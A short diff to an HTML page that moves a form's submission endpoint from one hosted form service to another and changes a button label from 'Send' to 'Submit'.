--- a/index1.html
+++ b/index1.html
@@ -11,7 +11,7 @@
     <div class="mx-5 mt-3">
     </div>
   </div>
-  <form action="https://formspree.io/f/mbjndeng" method="POST">
+  <form action="https://submit-form.com/d1ku6rW8u" method="POST">
     <div class="relative flex border bg-[#e9ebee] h-10 md:hidden lg:hidden sm:block">
       <div>
         <div>
@@ -166,7 +166,7 @@
   </p>
 </div><div class="border mx-3 h-10 mt-3 border-slate-200 bg-slate-200"><div class="flex justify-end mx-2">
   <button class="border h-7 w-16  bg-[#4267b2] text-white shadow-2xl mt-[0.30rem] font-serif font-thin text-xs hover:bg-blue-500" id="delete-btn">
-    Send
+    Submit 
   </button></div>
 </div>
 <div class="mt-4">
